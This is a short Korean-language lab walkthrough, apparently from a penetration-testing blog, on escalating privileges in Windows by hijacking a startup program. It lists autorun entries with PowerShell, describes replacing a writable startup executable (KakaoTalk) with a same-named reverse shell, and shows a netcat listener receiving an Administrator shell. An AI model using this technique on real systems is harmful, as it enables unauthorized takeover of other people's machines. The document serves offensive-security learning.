Windows에서는 장치가 부팅되거나, 사용자가 로그인 했을 때 자동으로 프로그램을 실행하는 기능입니다. 기본적으로 파워쉘 환경에서는 아래의 명령으로 등록된 자동 스케줄 목록을 확인할 수 있습니다.
# 명령어
Get-CimInstance Win32_StartupCommand | select Name, command, Location, User | fl
# 실습
Name : KakaoTalk
Command : "C:\Program Files (x86)\Kakao\KakaoTalk\KakaoTalk.exe" -bystartup
Location : HKU\S-1-5-21-1865062479-2107738167-63151596-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
User : \Administrator
실습 환경에서는 Administrator 사용자가 로그인을 다시 할 때마다 KakaoTalk.exe 파일이 실행됩니다. icals 등을 통해서 해당 디렉토리에 쓰기 권한이 있을 때 해당 위치의 실행 파일 이름과 동일하게 작성한 리버스 쉘을 작성하면 사용자가 로그인 했을 때, 스케줄 등록 주체의 쉘을 획득할 수 있습니다.
Practice
먼저 자동화가 등록된 실행 파일의 디렉토리에서 쓰기 권한이 있는지를 확인한 후 쓰기 권한이 있는 디렉토리에서 덮어 쓸 실행 파일을 다른 이름으로 백업합니다. 이후 리버스 쉘 실행파일을 생성한 뒤 등록된 실행 프로그램의 이름으로 업로드합니다.
이후 등록 주체의 컴퓨터를 종료하거나 로그아웃 후, 다시 로그인을 하게 되면 실행 주체였던 Administrator의 쉘이 획득됩니다.
└─# nc -lvnp 9999
listening on [any] 9999 ...
connect to [192.168.200.132] from (UNKNOWN) [192.168.200.1] 49884
Microsoft Windows [Version 10.0.26100.2454]
(c) Microsoft Corporation. All rights reserved.
C:\Windows\System32>whoami
\administrator
